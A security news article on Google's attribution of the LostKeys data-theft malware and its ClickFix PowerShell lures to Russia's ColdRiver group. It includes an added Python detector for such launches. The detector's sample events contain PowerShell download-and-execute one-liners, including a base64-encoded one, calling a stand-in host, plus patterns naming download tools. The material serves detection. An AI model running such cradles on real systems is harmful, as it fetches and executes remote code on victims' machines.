Google Links New LostKeys Data Theft Malware to Russian Cyberspies
Google's Threat Intelligence Group (GTIG) has linked a new data theft malware, tracked as LostKeys, to the Russian state-backed ColdRiver hacking group. Since the start of the year, ColdRiver has used LostKeys in espionage attacks targeting Western governments, journalists, think tanks, and non-governmental organizations.
According to GTIG, LostKeys was first observed in January as part of ClickFix social engineering attacks. In these attacks, the threat actors trick targets into running a malicious PowerShell script, which downloads and executes additional stages on the victim's device, ending with the LostKeys data theft malware.
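The ClickFix chain described above hinges on the target pasting a PowerShell one-liner into the Run dialog or a terminal, so process-creation telemetry is the natural place to catch it. The following is an added example, not GTIG's detection logic and not derived from the LostKeys samples: it scores constructed, simplified Windows event 4688-style records for the generic traits of a paste-and-run lure (interactive parent process, download cradle, hidden or encoded execution). The record format, process names, indicator weights, and URLs are all assumptions made for this illustration.

```python
"""
Heuristic detection of ClickFix-style PowerShell launches in process-creation
telemetry.  Added illustration only: the indicator list and weights are
generic properties of paste-and-run lures, not GTIG's detection rules, and
the log records below are constructed in a simplified key=value rendering
of Windows Security event 4688 (they are not real telemetry).
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional


def _enc(ps: str) -> str:
    """Encode a command the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample records (hypothetical hosts and paths).
SAMPLE_EVENTS = [
    # 0: ClickFix-style: pasted into the Run dialog (parent explorer.exe),
    #    hidden window, policy bypass, download cradle piped into iex.
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentProcessName=C:\\Windows\\explorer.exe "
    'CommandLine="powershell -w hidden -ep bypass -c iex (iwr http://stage.example.invalid/a.ps1 -UseBasicParsing)"',
    # 1: Benign interactive use from the Run dialog.
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentProcessName=C:\\Windows\\explorer.exe "
    'CommandLine="powershell -NoExit -c Get-ChildItem C:\\Users"',
    # 2: Scheduled maintenance script launched by the task scheduler host.
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentProcessName=C:\\Windows\\System32\\svchost.exe "
    'CommandLine="powershell -ep bypass -File C:\\Ops\\cleanup.ps1"',
    # 3: Encoded cradle typed into a terminal session.
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentProcessName=C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\WindowsTerminal.exe "
    'CommandLine="powershell -nop -w hidden -enc '
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/b.ps1')")
    + '"',
    # 4: Not a PowerShell host; ignored by the detector.
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\notepad.exe "
    'ParentProcessName=C:\\Windows\\explorer.exe CommandLine="notepad.exe notes.txt"',
]

INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}  # Run dialog / terminal
PS_HOSTS = {"powershell.exe", "pwsh.exe"}

# (weight, pattern) applied to the command line plus any decoded -EncodedCommand.
INDICATORS = {
    "download_cradle": (2, re.compile(
        r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b"
        r"|downloadstring|downloadfile|net\.webclient", re.I)),
    "invoke_expression": (1, re.compile(r"invoke-expression|\biex\b", re.I)),
    "hidden_window": (1, re.compile(r"-(?:w|win|window|windowstyle)\b\s+hidden", re.I)),
    "encoded_command": (2, re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{16,}", re.I)),
    "exec_policy_bypass": (1, re.compile(r"-(?:ep|ex|exec|executionpolicy)\b\s+bypass", re.I)),
    "no_profile": (1, re.compile(r"-(?:nop|noprofile)\b", re.I)),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    index: int
    score: int
    indicators: list[str] = field(default_factory=list)
    decoded: Optional[str] = None


def parse_event(line: str) -> dict:
    """Parse a key=value record; quoted values may contain spaces."""
    return {key: value.strip('"') for key, value in FIELD.findall(line)}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of a -EncodedCommand argument, if one is present and valid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(index: int, ev: dict) -> Optional[Finding]:
    """Score one PowerShell launch; returns None for non-PowerShell processes."""
    if _basename(ev.get("NewProcessName", "")) not in PS_HOSTS:
        return None
    cmdline = ev.get("CommandLine", "")
    finding = Finding(index=index, score=0)
    if _basename(ev.get("ParentProcessName", "")) in INTERACTIVE_PARENTS:
        finding.score += 2
        finding.indicators.append("interactive_parent")
    finding.decoded = decode_encoded_command(cmdline)
    text = cmdline if finding.decoded is None else cmdline + "\n" + finding.decoded
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(text):
            finding.score += weight
            finding.indicators.append(name)
    return finding


def detect(events: list[str], threshold: int = 4) -> list[Finding]:
    """Return the launches whose combined indicator score reaches the threshold."""
    findings = (score_event(i, parse_event(line)) for i, line in enumerate(events))
    return [f for f in findings if f is not None and f.score >= threshold]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f.index}: score={f.score} indicators={f.indicators}")
```

The weights are deliberately coarse: an explorer.exe parent alone (the Run dialog) is common for legitimate interactive use, so it only becomes a finding in combination with a download cradle, an encoded command, or a hidden window. Commands entered through the Run dialog are also recorded under the user's RunMRU registry key, so the same indicators can be applied to that artifact when triaging a host after the fact.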
"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," GTIG said. "The typical behavior of COLDRIVER is to steal credentials and then use them to steal emails and contacts from the target, but as we have previously documented they will also deploy malware called SPICA to select targets if they want to access documents on the target system. LOSTKEYS is designed to achieve a similar goal and is only deployed in highly selective cases."
ColdRiver is not the only state-backed group using ClickFix-style social engineering: Kimsuky (North Korea), MuddyWater (Iran), APT28 and UNK_RemoteRogue (Russia) have employed similar tactics. ColdRiver itself has been active since at least 2017, relying on social engineering and open-source intelligence (OSINT) to profile and approach its targets.
Five Eyes cyber agencies also warned in December 2023 of ColdRiver's spear-phishing attacks against defense, governmental organizations, NGOs, and politicians, noting that since 2022, the year Russia invaded Ukraine, the group had expanded its targeting to defense-industrial organizations and U.S. Department of Energy facilities.
In 2022, the Microsoft Threat Intelligence Center (MSTIC) disrupted another ColdRiver social engineering operation by disabling Microsoft accounts the attackers used for reconnaissance, phishing, and harvesting the emails of organizations and high-profile individuals in NATO countries.
The U.S. Treasury Department sanctioned two ColdRiver operators in December 2023, one of them an FSB officer, who were also indicted by the U.S. Justice Department for their involvement in a global hacking campaign coordinated by the Russian government. The State Department offers up to $10 million in rewards for tips that help law enforcement locate or identify other ColdRiver members.
The LostKeys findings fit ColdRiver's established pattern: credential phishing for routine access to email, with malware deployed only against a small set of targets whose documents the group wants. For organizations in that target set, any web page or support message that asks a user to copy a command and run it themselves should be treated as a likely ClickFix lure.